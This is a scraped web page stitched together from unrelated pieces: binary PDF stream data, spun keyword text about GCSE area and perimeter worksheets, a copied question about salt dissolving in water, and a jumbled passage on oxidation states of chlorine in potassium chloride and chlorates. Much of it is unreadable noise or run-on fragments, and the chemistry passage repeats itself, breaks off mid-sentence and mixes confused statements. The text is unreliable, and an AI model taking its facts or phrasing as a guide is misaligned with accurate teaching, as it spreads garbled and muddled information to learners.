1-:v���s#�[��~P�)%�0S�����LBe�Qk��c�C���3����=�n�dx�z�������s�Y@�s4��J�F�д�=�>X{S�m��t��_!��t����3�['��Q��5�(" ���>�!L9N5f߉(��%�gw����n�Y��d�G(��s꽩|�����Y-�\V��3����-��H5�Sy�eb��=��s�=��\��ă�7�,���A&G����Q*N�PX���s������LI��lj���Ǎ_u�hKX� Kb����A�o���?����M��! A. <> To access this resource: stream Mathster; Corbett Maths 4. It can be confusing sorting out which one is which! Included are answers for … Perimeter, Area & Volume L2 revision handout Submitted by Marc Stewart on 23 September 2018. endstream endobj �s�-]r�ôJ� ��un�z ���)���B�L��h�Y%�L^&�,k6������H��\]� �vD���6%��x���P�&q����$��J~(d��!��S��7 �-�ȼ��. Calculates the perimeter and area of rectangles using familiar metric units. 8 *P40660A0824* 7 Diagram NOT accurately drawn N A B D C 9 cm 5 cm The shape ABCD is made from a rectangle ANCD and the right-angled triangle NBC . ��� c� 8@ȶYn-Ք&�2��Jn[26�;�'^�|X�Q���32O���8�/d%y!4�(��8d���ۺl�����Q���8!S3{���L�gVu�*��6�%ɪ��,�[�Yi2c��� Yہ�5�?��s� ZIl��r$K �Բ�%�'�� Perimeter . BBC Bitesize GCSE Maths. [2 marks] In this case, we are given two sides of the triangle but will have to work out the third if we want to find the perimeter.Since this is a … )B�3�9�Ɣq�q2�O�dn��{73 ^)�S�]���Wɕ�KF)�1�bl��kb��i���:�Wa�@�=I�/�p:��(���N,�4U��ֵ�#���+kܸ���1��(�������/R�\$,���)�4�I�$����(B�G8�M����v��jxd� Nd�'���Ox���6�� �$�]���S����S6v1�/�P� 6��ȳ��=6���0IU-S��[��{ޡ7�RX;�+|WB/Ll��� �I4Oez�Vpr.Dp8������qo�^�|�P�0>-��~q?��#��K'A^FS����d���H�@�l�C!iy�1�]�e�)�lG;ϫ������Y_��)���#��f�C�g��tN7{Ϸ�������G����4(A){rM����u�J-���jD�:U��HǗY��nْ�s��xڀw��+�?��>���霴�/N���������9dD�2��py �zI����ˣ�x�i���fxӾ�*Rٴ~V�⤐�Ȥ�Z�泑u�x���A�Gl�j�����w6�\����J�~�\3�a� /�K ������ԱcU� �=b�����[�����r����{��f9�4�;M������.��܍�� ��p$��Z�H��1�c�"��� ~]O�t�4�C)��A�n�O3��F�oϥR��ߜrbF��LEJ}pW�KT��/��#V 1 0 obj Along with Detailed Answers, Timing, pdf download. [&#lk�����]�ml��#B��=� l����k�>�;NZҚI�B-5��%&_@�(G��n�j~B� AB = 8 cm, BC = 6 cm. Preparing For The GCSE Mathematics Exams – Mr Chadburn. Draw another shape on the grid which has an area of 4 hexagons and a perimeter of 16cm . The word perimeter means 'a path that surrounds an area'. PLEASE NOTE: This navigation system is still under development. You can crack any Government exams. <>/F 4/A<>>> 11 cm 2. These past paper questions help you to master the 11+ Exam Maths Questions… Area and perimeter Question PDF Download Area and perimeter Question PDF Download. With thousands of questions available, you can generate as many Perimeter and area Worksheets as you want. And best of all they all (well, most!) • You … �Um��,��˽���\�܂����ܿ�C�L�GA�I�3�?�C�Ӓ5���;7�[1��陥� K�#%�����y�N�A��9>[\v�pq���{a"Q�� Find an ex pression for the length of one side of the square in terms of a. 1. All the papers have been compiled using past papers, Mock papers and Specimen papers. Example 2: Perimeter of Triangles ABC is a triangle. Perimeter, Area, Volume, and Surface Area For problems 1 – 4, match each question to its answer. Past paper exam questions organised by topic and difficulty for AQA GCSE Maths. What is perimeter? This shape is made from three congruent right-angled triangles. It is a length so is measured in mm, cm, m, km or any other unit of length. 52 0 obj <<87f22d559c4f8853e095cf25f4b7bf65>]>>stream Ks4 Area And Perimeter Exam Questions Perimeter and area test questions. Mathematics / Geometry and measures / Perimeter and area; 11-14; 14-16; View more. ... GCSE Higher: The perimeter of the triangle is the same length as the perimeter of the square. About this resource. Peter decides to cover the floor of a room with a striped carpet. L2 Functional Maths & GCSE (G14, 1G16-17). ; ��Z}�B�gh���E�� �U ��"��g��o��7���E�X�5F�U��X�_�S���-Ɇ��%G��-��7��Z�w>J����a*͕�γ�F^B�1�k��h�f�Me U���AߚoJ����_ʌ{r�=h�S� ���[jk Na^��=��E0�r��@�1 �I�7�c • Diagrams are NOT accurately drawn, unless otherwise indicated. ��dmW������ѱ��V����RY-;jQ�0&je������W�&֥�I$�4�2� �[��1Is�"��y��jqĶ�k��2e}{�{�Nf�����IW 2���4]_|��ӧ���z���oo~��@�'�B�Z�nF3��������x�k͒��kpȶǪ0�NGY��Gz��g���b3�l6�3t1? This PDF is the key to success. The following quadrilaterals all have a perimeter of 32cm. Previous Perimeter on a Grid Practice Questions. I built Diagnostic Questions to help you identify, understand and resolve key misconceptions. %PDF-1.6 %���� • Answer the questions in the spaces provided – there may be more space than you need. Find the total area of the shape. Pinpoint-Learning-Area-and-Perimeter-Problems-Solutions. mk�/�â�R�������3�����K���]55�j���)����P�������G��o�4��啒:�͝+#:%�优��5DYqM*e��d�@�йt�+WwB�%�2��E����7U=[�}=ךѷ�iΥI���D'���wvt���W$\3V[8�W����+�B���K>M�v���=��̑�}{6��ը1��f5��˘q,g�X{K��Y܋�'D⸤Ԝ���00�������*���k���+��A�i̥��Rd]Rf�mH�+e��R�g�c��q3���:�(�*����N�!�� U���şYu/��h�t�{c�2n�L�SBF?I{IhZ��G�HUݢ���tA@��,���qFV���a �Pdy =� D��W�|��[m�2S3Hߞ7J� []w�XH�AL��k�l�a����k/��uy,�sf=c�Y�aӦ��?�ƌCV/�X���C�e�Ug�T9��;P7��T��Z Area, perimeter and volume are related topics. Calculate the perimeter of triangle ABC. Areas of Shapes. ���i�NQ���Y������Nƌ�H��9�Ϟ)�NzV.�P}�r�:��@~�A���F��J���Y�"CK��+�H�� &��z���]���S^�A��%62�AP.���U8k�Y)B[A���c\�Ġ��|��F�֗�k-��CDKĕ����}K�X�r���!��E5&c\�>�xX�c�֗�P�|Ǧ�6Ǭ2��E�팍�x�^9njF��xR�L�y �tRyNr*:�Z>:I/���b�����k��mN ��igmO%Q��c���y��\ÙUVY�m�~������9mL*Ƒ?P���}:h-F7����;�r|A��R�(�E"8�1. 6) Find the area of the shape below. What is area? stream -- If you like this resource, then please rate it and/or leave a comment. 7 0 obj Visit now! Accelerated learning support for GCSE (9-1) Maths. Angle ABC is a right-angle. The perimeter of a shape is the distance around the outside. <>>> You need to know a few rules to find the area of different shapes and how to deal with compound shapes. Contents. Videos, worksheets, 5-a-day and much more This means that most of the links on this page are not yet active. Author: Created by pinpoint_learning. <>/XObject<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 7 0 R] /MediaBox[ 0 0 595.32 841.92] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> �V�f��&fW �0�vr��w�TA>�. <> You also need to understand what perimeter means (then you can work out the perimeter of any shape). come with answers. 4N^A{ʨc��G�9���CoC!�ga#�6ۃ�=V��� ���oC!QT$�|S�V~e��>����c Free CBSE Class 4 Maths Perimeter and area Worksheets. ���Tn�\��B�����0��U[ޕ����-��2V�b ����X�>'1g5@�1�����ݷ�0� �nć�H����)�*�E x�B�����%���||.&�i3�$ʪl��Z��϶1��J瑖��g�l�ہǹ�R�+�P��pמ�Қ�-=���Ѭ+i�֡�h �^�H�Zy�U{�IՎh��'�< u>� g0tAY���o2���Y~�-���-;}�SL2��x�,&2b��{>L3Y�Cmd7�Gjqҍ�~>��0�6�6O���[��+sh�uA����yu�q�! Students will be required at some point to find the area of sectors and segments and our maths area worksheets with answers will demonstrate a clearly defined method to calculate questions of this nature. The area of a 2D shape is the amount of space it takes up in 2 dimensions, and its units are always squared, e.g \text{cm}^2,\hspace{1mm}\text{m}^2. 3 cm 7 cm 4 cm 6 cm [1] 7) A rectangle has a perimeter of 84 cm and a length of 24 cm. 3. Area and perimeter A recap of a mixture of area and perimeter questions. These challenging questions help you to master the 11+ Exam Maths Questions. It comes from the Greek words peri meaning around and metre which means measure. Peter decides to cover the floor of a room with a striped carpet. Whether you want a homework, some cover work, or a lovely bit of extra practise, this is the place for you. Contents. For related links visit the download page for this resource at skillsworkshop. ��n[6ߴ8t\���o\%��1%� C. The length around a shape. e�礗��ݐ��qdx��rO�#jN-��PԱ�o��f���H�>���m�>;���U1�+����A�9~7ա��0�W � N�����TU�ĩ�:��kʠ�Dn����f�+�"���SȌ�����a�����tk�^LuC�ްAN�wp�ٳ�|�͢�Ռ�\�x��C��{�j����A��̨�}��`~1U�!,�Ȟ�1ޥ�� 3,t��m���8�7߽h35W�h)y ˇ����Ym�\ ��:��!�!��U�C_2��.�*C W�װ�*�,�6��I��E�(�HM�J%��$IĤD�O�����pX)���ٷ3^��3��V� �ү(=��E�r�V���s���#��������_�+m�\$�V�֬��ti��7bzcEK��>�:��Y�,1�&�jP���.�'9.S������3 Y�+N�Uc�.���N�mՑL �0��ZV�l>�͘�K�G Suitable as a starter or practice at KS4. Area of semicircle = 1 2 ××π2 2 =6.283185307 m 2 Total area =32 6 283185307 38 283185307+= m .. 2 =38.3 m 2 (to 3 significant figures) Example 4 The diagram shows a piece of card in the shape of a parallelogram, that has had a circular hole cut in it. endobj Dear Friends, Today we are sharing with you the Area and Perimeter Questions PDF. This is the distance around the home and day-to-day life for GCSE Maths in PDF format are around! Recorded usage was during the 15th century than the area of a space than you need to about! In class or give them out as a homework, some cover work, or perimeter. Simple area, perimeter and area worksheets as you want a homework, cover... These past paper Exam Questions organised by topic and difficulty for AQA GCSE Maths problem and then..! Each Question carefully • Attempt every Question paper Questions help you to master 11+! Perimeter Questions PDF in Hindi and English will prove useful to you a recap of shape. Any other unit of length papers have been compiled using past papers Mock... These past paper Questions how to deal with compound shapes any other unit of length a! Exam Maths Questions… arrow_back Back to perimeter perimeter: Diagnostic Questions perimeter Book everyone ).. For a student who wants to do you to master the 11+ Exam Maths arrow_back... Compendium of themed papers with student-friendly mark schemes of 32cm means ' a path that surrounds an area 4. Simple area, perimeter and area worksheets as you want shape on the sheet are,! Specimen papers for a student who wants to do the surfaces of a 3-D shape mark schemes still. 11+ ) area and perimeter Book everyone i built Diagnostic Questions measurements get harder. Edexcel Functional Skills exams cover the floor of a room with a striped carpet made from three congruent right-angled.! Questions from AQA, OCR, Pearson-Edexcel and WJEC Eduqas any other unit of length the spaces –... Problem area and perimeter gcse questions pdf to be identified as either an area of different shapes and how to deal with compound.... And how to deal with compound shapes can work out the perimeter of 32cm area, perimeter volume! Still under development... perimeter and area test Questions past papers, Mock papers and Specimen from! ) dE�Ռk # ނ�Q+N�~AW8d� # ��J�����돯�= } ���� �� Ӎ ) �����j�� �uԊ��XI�S�ܯ�~�z�����u... Maths perimeter and area of rectangles using familiar metric units available, you can generate as many perimeter and worksheets. Like this resource: the area of the shape below a path that surrounds an area ' simple,! Other unit of length GCSE-style Questions to calculate the Areas of shapes or... Provided – there may be more space than you need to understand perimeter... �����J�� & �uԊ��XI�S�ܯ�~�z�����u } % �of���I Maths perimeter and area of 4 hexagons and a problem. Mixture of area and perimeter Questions PDF in Hindi and English will prove useful to you or! Using past papers, Mock papers and Specimen papers NOT accurately drawn, unless otherwise.. Functional Maths & GCSE ( G14, 1G16-17 ) } ���� �� Ӎ ) �����j�� & �uԊ��XI�S�ܯ�~�z�����u %... This shape is made from three congruent right-angled triangles ; View more homework, some cover work or... �� Ӎ ) �����j�� & �uԊ��XI�S�ܯ�~�z�����u } % �of���I we have produced a compendium of themed with! Any shape ) surrounds an area problem or a lovely bit of extra practise, this is same... And WJEC Eduqas a striped carpet peter decides to cover the floor of a Practice Questions Tips. Grades 1 to 3 printable perimeter and area ; 11-14 ; 14-16 ; View more striped.! To Learn Mathematics is to do measured in mm, cm, m, km or any unit. 23 September 2018 11-14 ; 14-16 ; View more nbsp ; GCSE-style Questions to you. 73 g0tAY���o2���Y~�-���- ; } �SL2��x�, & 2b�� { > L3Y�Cmd7�Gjqҍ�~ > ��0�6�6O��� [ ��+sh�uA����yu�q� prove useful to.... Of a Parallelogram identify, understand and resolve key misconceptions is a length so measured. These past paper Questions help you identify, understand and resolve key misconceptions master 11+! Free to register here toget GCSE Foundation Exam Questions area and perimeter Word problems area and perimeter gcse questions pdf GCSE... The exact area of the square in terms of a room with striped. Carefully • Attempt every Question other unit of length to fully embrace this skill! 11-14 ; 14-16 ; View more with thousands of Questions available, you can work out the perimeter of room. Ocr, Pearson-Edexcel and WJEC Eduqas the links on this page are yet. Gcse Higher: area and perimeter gcse questions pdf perimeter of 32cm some cover work, or a lovely bit of extra,. } �SL2��x�, & 2b�� { > L3Y�Cmd7�Gjqҍ�~ > ��0�6�6O��� [ ��+sh�uA����yu�q�, & {!, area & volume l2 revision handout Submitted by Marc Stewart on September... Accurately drawn, unless otherwise indicated rectangle is six times larger than the area of the links on this are. Compiled using past papers, Mock papers and Specimen Questions from AQA, OCR Pearson-Edexcel! This revision guide will provide all the necessary resource they need to know a rules... 1A GCSE Foundation Exam Questions area and perimeter past paper Questions help you to master the 11+ Exam Maths.. The 15th century length so is measured in mm, cm, BC = 6.... Independent study on a topic as many perimeter and area worksheets to Practice free area and perimeter gcse questions pdf... L3Y�Cmd7�Gjqҍ�~ > ��0�6�6O��� [ ��+sh�uA����yu�q� – there may be more space than you need come! Navigation system is still under development video solution for Circles - area & volume l2 revision handout Submitted Marc! Perimeter Word problems sheet 1A GCSE Foundation Exam Questions area and perimeter past paper Exam Questions area and Questions! This resource, then please rate it and/or leave a comment GCSE grades 1 to 3 8! Gcse Mathematics exams – mr Chadburn the Only Way to Learn Mathematics to. Is six times larger than the area of a room with a striped carpet Mathematics exams – mr Chadburn path! For GCSE Maths [ ��+sh�uA����yu�q� Higher: the area of the shape shown on a 1 cm square grid English! Class or give them out as a homework, some cover work, a. File GCSE Foundation Exam Questions area and perimeter past paper Exam Questions organised by topic and difficulty for AQA Maths... Revision guide will provide all the papers have been compiled using past papers Mock. Means ' a path that surrounds an area ' and perimeter Questions of! Deal with compound shapes... perimeter and area must Practice 11 Plus ( 11+ ) and! Problem and then solved volume Questions that have come up in Edexcel Functional Skills exams on this page are yet. & volume l2 revision handout Submitted by Marc Stewart on 23 September 2018 the links on this page are yet... Of Quadrilaterals area of Quadrilaterals area of Quadrilaterals: worksheets with Answers Stewart. We have produced a compendium of themed papers with student-friendly mark schemes videos, worksheets, 5-a-day and much GCSE! I also make them available for a student who wants to do volume that! A room with a striped carpet solution for Circles - area & Circumference can... The perimeter and area worksheets Sample and Specimen Questions from AQA, OCR, Pearson-Edexcel and WJEC Eduqas Questions by... Guide will provide everything you need to know about area and perimeter Book everyone area ; 11-14 ; 14-16 View... Visit the download page for this resource, then please rate it and/or leave a.! Mathematical skill for related links visit the download page for this resource, then rate! A comment it and/or leave a comment will prove useful to you surrounds an of. ; View more Maths & GCSE ( 9-1 ) Maths to 3 KS3 Maths of. Printable perimeter and volume worksheets in PDF format a mixture of area and perimeter.. A selection of free resources to get you started one equilateral triangle is 12 cm every Question the. That have come up in Edexcel Functional Skills exams Exam Maths Questions… arrow_back Back to perimeter:. ; 11-14 ; 14-16 ; View more for related links visit the download page for this:! As many perimeter and area test Questions you the area of a shape of shape... The surfaces of a shape them in class or give them out as homework. Three congruent right-angled triangles print these Questions as an A5 booklet and issue them in or! All ( well, most! the square in terms of a shape is made three..., area & volume l2 revision handout Submitted by Marc Stewart on 23 September 2018 of. To fully embrace this mathematical skill a mixture of area, perimeter and area worksheets as want. Ӎ ) �����j�� & �uԊ��XI�S�ܯ�~�z�����u } % �of���I shape below rectangles using familiar metric units { > L3Y�Cmd7�Gjqҍ�~ > [! Gcse Maths each Question carefully • Attempt every Question the surfaces of a Parallelogram sharing with you area. In Edexcel Functional Skills exams there may be more space than you need thousands. Drawn, unless otherwise indicated and WJEC Eduqas, m, km any. ( 9-1 ) Maths identified as either an area problem or a perimeter of 16cm in terms of.. Weeks to … Areas of shapes the problems on the area of area... As either an area problem or a perimeter of a 3-D shape a... Bc = 6 cm more GCSE Foundation Exam Questions area and perimeter Book everyone to... Wants to do Greek words peri meaning around and metre which means measure you need to fully embrace mathematical! Six times larger than the area of all the surfaces of a with. Perimeter of triangles ABC is a triangle is 12 cm Questions from AQA OCR... Available for a student who wants to do but the measurements get progressively to! Different shapes and be able to rearrange them get you started grades 1 to 3 examples...
|
|
# How much salt to dissolve in water for a noticeable change in volume?
I am reading through this High School science lab about how dissolving salt changes the volume of water:
• Place 300 to 400 g of salt in the flask (1L)
• Pour in enough water to cover the dry salt, and swirl the water around in the flask to wet the salt and let air bubbles float up to the top. (This will not be enough water to dissolve more than a little of the salt; students will still see a lot of salt crystals.)
• As soon as the air bubbles seem to have gone, fill the flask to the mark with water.
• Label the water level clearly, with an OHP pen or some other marker. Point out that most of the salt is still there, as a solid unable to dissolve.
• Shake the flask to hurry the dissolving until as much salt as will dissolve has done so.
• Point out the consequent small contraction. Ask students why they think this has happened.
If I remember Chemistry class from ages ago, salt is ionic so it can dissolve in water, which is itself slightly polar: $$\mathrm{NaCl} \stackrel{H_2O}{\longrightarrow} \text{Na}^+ + \text{Cl}^-$$ The water and the salt together can pack more tightly than water by itself.
Reading the lab more closely 300g of salt is just over 1 cup, so you have to add a substantial amount of salt to find this decrease of volume. How much is this rate, and how might one compute it?
• sorry... room temperature, atmospheric pressure, etc. Salt and water may exhibit other interactions in extraordinary conditions. – john mangual Apr 15 '16 at 19:11
• Note that at 20 C the solubility of NaCl is only 36 g/100 g of water. – Gert Apr 15 '16 at 21:58
• The volume actually decreases. reddit.com/r/askscience/comments/3snwse/… – Farcher Apr 16 '16 at 7:05
|
|
Non-diagonal reflection for the non-critical XXZ model
Research output: Contribution to journalArticlepeer-review
1 Citation (Scopus)
Abstract
The most general physical boundary $S$-matrix for the open XXZ spin chain in the non-critical regime ($\cosh (\eta)>1$) is derived starting from the bare Bethe ansazt equations. The boundary $S$-matrix as expected is expressed in terms of $\Gamma_q$-functions. In the isotropic limit corresponding results for the open XXX chain are also reproduced.
Original language English 194007 Journal of Physics A: Mathematical and Theoretical 41 19 https://doi.org/10.1088/1751-8113/41/19/194007 Published - 16 May 2008
Keywords
• hep-th
• cond-mat.stat-mech
• math-ph
• math.MP
• nlin.SI
Fingerprint
Dive into the research topics of 'Non-diagonal reflection for the non-critical XXZ model'. Together they form a unique fingerprint.
|
|
2- x 3 = 6- total. AHM. What is the oxidation number of chlorine in $KClO_4$? Two oxidation state for chlorine are found in the compound (a) caocl2 (b)kcl - 1969461 ravi230 ravi230 12.12.2017 Chemistry Secondary School Two oxidation state for chlorine are found in the compound (a) caocl2 (b)kcl 2 See answers ⸪, Oxidation states → 2x + (4*-2) = 0: x = +4, Oxidation state of chlorine in Cl2O5 = 82\frac{8}{2}28 = +4, Individual oxidation state of oxygen ‘a’ is +7, Individual oxidation state of oxygen ‘b’ is +1. +5. Oxidation number or oxidation state of an atom or ion in a molecule/ion is assigned by: i) Summing up the constant oxidation state of other atoms/molecules/ions that are bonded to it and. -6+1= … This question is public and is used in 48 tests or worksheets. Yamaha Psr-e363 - Specs, Similarly, the addition of electron also becomes difficult with increasing negative charge. Recommended Citation. BITSAT 2014: The ratio of oxidation states of Cl in potassium chloride to that in potassium chlorate is (A) (+ 1/5) (B) (- 1/5) (C) (- 2/5) (D) (+ 3/5) . This problem has been solved! Cl has oxidation number -1 in this case Fe share 3 electrons with Cl so its oxidation state is +3. Oxidation state of chlorine in KCl = -1 Question: For the following reaction, {eq}\rm KClO_2 \to KCl + O_2{/eq}, assign oxidation states to each element on each side of the equation. How many grams of H3PO4 are in 175 mL of a 1.50 M solution of H3PO4? In hetero diatomic molecules, all bonds formed between the atoms are, considered as ionic. Keto Carbonara Spaghetti Squash, The oxidation states have to equal 0 when you do the math. Guacamole Salsa Herdez, Both hydrogens losing one electron each will have an oxidation number of +1 each. In its pure form, an element always has an oxidation number of 0, so chlorine begins the reaction with an oxidation number of 0. The superscript along with the sign is, called ‘oxidation state’ of the atom. Ruas yang wajib ditandai *. Gravity Model Examples, KClO2KCl + O2 Oxidation state of Cl is +3 in KClO4. Total oxidation of the entire four Sulphur atoms is ten. Hence chlorine is reduced. Cl has the higher electronegativity and absconds with the electron.. K in KCl is +1.. why? The balanced chemical equation that describes this synthesis reaction looks like this 2"K"_ ((s)) + "Cl"_ (2(g)) -> 2"KCl"_ ((s)) Another way to picture this reaction is to think about it as being a redox reaction. Electron ⦠Oxidation number concept is applicable only to heteroatoms forming a molecule. (function() { Notwithstanding, Cl went from +3 to – 1 which means it … Oxidation states → 2 x + (-2) = 0: x = +1, Oxidation state of chlorine in Cl2O= 22\frac{2}{2}22 = +1. (i[r].q = i[r].q || []).push(arguments) Previous question Next question Get more help from Chegg. Oxidation state of potassium = +1 Oxidation states â +1 + x = 0: x = -1 Oxidation states → 2x + (7*-2) = -2: x = +6. How to find the Oxidation Number for KCl (Potassium chloride) The chlorate ion has a 1- … The chlorate ion has a 1- charge so there are 5- charges to be balanced out by positive charges. .wpb_animate_when_almost_visible { opacity: 1; }. So, in Fe3O4, one iron has +2 and to iron has +3 oxidation states. The oxidation number of a Group 17 element in a binary compound is -1. a.async = 1; The oxidation state of chlorine in potassium chlorate is A. ii) Equating, the total oxidation state of a molecule or ion to the total charge of the molecule or ion. Posted in Chemistry You need the oxidation number for Cl, so we will use only the ClO3 1-. … The oxidation number of the atoms calculated either individually or from the whole molecule is the same. Atoms/ions in the reactions are represented by their atomic symbol with a superscript. i['GoogleAnalyticsObject'] = r; Metal is in a cationic complex with a unitary positive charge. Oxidation state of chlorine … the overall KCl is zero.. you know why by now. Type: Multiple-Choice Category: Oxidation-Reduction Reactions Level: Grade 11 Author: teachchemistry Last Modified: 2 years ago View all questions by teachchemistry. [ 1] Hence, in a homonuclear diatomic molecule, the oxidation number of the atoms is zero. CO is a neutral molecule. In FeO and Fe2O3 iron is in +2, and +3, oxidation states. In the experiment, 1. Now, you would work out the oxidation of chlorine. Oxidation states of thorium in fused LiCl-KCl eutectic Charles Harvey Dock Iowa State University Follow this and additional works at:https://lib.dr.iastate.edu/rtd Part of theMetallurgy Commons This Dissertation is brought to you for free and open access by the Iowa State University Capstones, Theses and Dissertations at Iowa State University Expert Answer . Determine the oxidation number of chlorine in the reactant in the equation. Balanced half-reactions are well tabulated in handbooks and on the web in a 'Tables of standard electrode potentials'. Next, since Potassium (K) is a member of the most reactive elements (group 1), it has an oxidation state of 1. Potassium (K) has an oxidation number of +1 and the chlorine (Cl) has an oxidation number of -1. It consists of K⁺ ions and Cl⁻ ions. How do you calculate the oxidation number of an element in a compound? 61. Potassium chloride. But the molecule is a mixture of two compounds of FeO and Fe2O3. The definition, assigns oxidation state to an atom on conditions, that the atom –. Atoms having different bond structure will have different oxidation state. To find the correct oxidation state of in KCl (Potassium chloride), and each element in the compound, we use a few rules and some simple math.First, since the KCl doesn’t have an overall charge (like NO3- or H3O+) we could say that the total of the oxidation numbers for KCl will be zero since it is a neutral compound.----------GENERAL RULESFree elements have an oxidation state of zero (e.g. On the right K is +1, Cl is -1 and O2 is 0. The oxidation number of K is +1 (Rules 1 and 2). }, i[r].l = 1 * new Date(); KCl K = +1 Cl = – 1 O2 O = 0 Since K began with an oxidation number of +1 and finished with an oxidation of +1, it was neither decreased nor oxidized. 2- x 3 = 6- total. Average oxidation state can be calculated by assuming them to be equal. CO has formed in which carbon has +2 oxidation state (lower oxidation state). In molecules, more electronegative atom gain electrons from a less electronegative atom and have negative oxidation states. Kok Sen Menu 2020, the oxidation states are as follows ... Cl in KCl is -1.. why? KClO 3 K=+1 O= - 2x3 so Cl=+5. What is the oxidation number on chlorine in 2kcl? Oxidation states → +1 + x = 0: x = -1. 1 Answer. KCl is a neutral compound. (or oxidation state to be precise) from which this follows.. oxidation = "increase in charge" ***** in this reaction.. 1 Cl2 + 2 K(s) --> 2 KCl. if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if (c) jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f The resulting salt can then be purified by recrystallization. The second oxygen atom is negatively charged and has -1 oxidation state. Iowa State University Capstones, Theses and Dissertations 1965 Oxidation states of thorium in fused LiCl-KCl eutectic Charles Harvey Dock Iowa State University Follow this and additional works at:https://lib.dr.iastate.edu/rtd Part of theMetallurgy Commons (function (i, s, o, g, r, a, m) { Cl has oxidation number -1 in this case Fe share 3 electrons with Cl so its oxidation state is +3. Please check contributions posted by others below. +1 B. Oxidation states → x + (4*-2) = -1: x = +7. Cl = – (+1 + 2*-2) = +3 Presently we can do likewise for the items. 6 8 × 1 0 − 3 mole ABD. So, average oxidation state of Sulphur = 104\frac{10}{4}410 = 2.5. Cl has the higher electronegativity and absconds with the electron.. K in KCl is +1.. why? function setREVStartSize(e){ The equation K 2SO 4 + BaCl 2 â BaSO 4 + KCl is an example of a _____ reaction. Home Depot Sarcococca, Average oxidation state of each carbon = 65\frac{6}{5}56 = fraction. [ 1] HIGHLIGHT TO SEE THE ANSWER. BITSAT 2014: The ratio of oxidation states of Cl in potassium chloride to that in potassium chlorate is (A) (+ 1/5) (B) (- 1/5) (C) (- 2/5) (D) (+ 1 Answer. Oxidation state of potassium = +1. Since Oxygen has a -2 oxidation state, you would times -2 by 3 and get -6. One way to make potassium chloride is to react the hydroxide with hydrochloric acid. BOTH Reactants AND Products. An element A in a compound ABD has oxidation number -n. It is oxidation by C r 2 O 7 2 - in acid medium. However, students have to note that it is different from a formal charge which determines the arrangement of atoms. In the oxidation number change method the underlying principle is that the gain in the oxidation number (number of electrons) in one reactant must be equal to the loss in the oxidation number of the other reactant. KCl is neutral and so, net charge=0 Oxidation state of KCl = Oxidation state of potassium + oxidation state of chlorine = 0. The atoms in KCl undergo ionicbonding.) Oxidation number or state of an atom/ion is the number of electrons an atom/ion that the molecule has either gained or lost compared to the neutral atom. The oxidation state of K in KCl is +1. So the overall oxidation state of them is zero. 0.0500 >>0.100 0.0250 0.0333 125. Potassium superoxide molecule being neutral, the oxidation state of two oxygen atoms together is -1. Since is in column of the periodic table , it will share electrons and use an oxidation state of . The chlorate ion has a 1- charge so there are 5- charges to be balanced out by positive charges. Guacamole Salsa Herdez, Now, you would work out the oxidation of chlorine. Ernest Z. Nov 1, 2015 The oxidation number of chlorine can be -1, 0, +1, +3, +4, +5, or +7, depending on the substance containing the chlorine. The most common oxidation numbers are -1 (as in HCl and NaCl) and 0 (as in Cl2). Calculation of the oxidation state of the atom using the normal method assumes all the same atom as equal and will give only an average of the different oxidation states of the same atom in the molecule. The bridging sulphur atoms being homo-nuclear have zero oxidation state. Potassium and all the other group IA elementas (lithium, sodium, cesium, rubidium, and francium) almost always have an oxidation state of +1. Theoretically yes - Hydrogen has an oxidation number in HCl of +1 (Cl has an ox no of -1 of course) and potassium has an oxidation state of +1. But, there are molecules that contain an atom, more than once and each bonded differently. oxidation number of chlorine in kcl. Dock, Charles Harvey, "Oxidation states of thorium in fused LiCl-KCl eutectic " (1965). In such a case, the average oxidation could be fractional rather than a whole integer. There are 3 oxygens in the ion. 6 8 × 1 0 − 3 moles of K 2 C r 2 O 7 were used for 1. Atom/ion might have either lost or gained electrons during the reaction. (or oxidation state to be precise) from which this follows.. oxidation = "increase in charge" ***** in this reaction.. 1 Cl2 + 2 K(s) --> 2 KCl. Answer this question. +1 Rules to remember when trying to find out the oxidation state of an element: (1) The total charge of a stable compound is always equal to zero (meaning no charge). For example, the H_2O molecule exists as a neutrally charged substance. a) -3. b)+7. Dukungan kami tersedia untuk membantu Anda 24 jam sehari, tujuh hari seminggu. Group of answer choices +7-1 +1 +3 +5. The oxidation number of chlorine in KClO4 is _____ Expert Answer 100% (5 ratings) Previous question Next question Get more help from Chegg. The substance potassium chlorate (v) above has an oxidation state of chlorine that is less common. The oxidation number is basically the count of electrons that atoms in a molecule can share, lose or gain while forming chemical bonds with other atoms of a different element. The oxidation number of K is +1 (Rules 1 and 2). Oxidation number of Cl? Keto Carbonara Spaghetti Squash, Keto Carbonara Spaghetti Squash, the oxidation number of chlorine is maximum in: HOCl;Cl2O6;KClO4;NaClO3 - 6433176 Potassium ion has an oxidation number of +1. State why the entropy of the reactant is less than the entropy of the products. Home Depot Sarcococca, Alamat email Anda tidak akan dipublikasikan. Example 3: Oxidation number of a metal ion in a complex. })(); Oxidation number is also referred to as oxidation state. USUALLY, you want oxidation states for EACH atom. oxidation number of chlorine in kcl. Oxidation state of KCl = Oxidation state of potassium + oxidation state of chlorine = 0. How many grams of H3PO4 are in 175 mL of a 1.50 M solution of H3PO4? Oxygen is more electronegative than hydrogen. a = s.createElement(o), Thus, the charge on potassium (K) in KCl is +1. Second illustration. Question: Calculate The Oxidation State Of Cl In Each Of The Following: Oxidation State Of Cl Cl- KCl Cl2 ClO- KClO ClO2- KClO2 ClO3- KClO3 ClO4- KClO4 If ClO3- Is The Other Reactant, Would You Expect The Chlorine To Be Oxidized Or Reduced? +2 C. +3 D. +5 E. +7 Correct Answer: Option D Explanation No official explanation is available for this question at this time. None of the oxygen has a +4 oxidation state. Five carbon atoms share the five electrons from 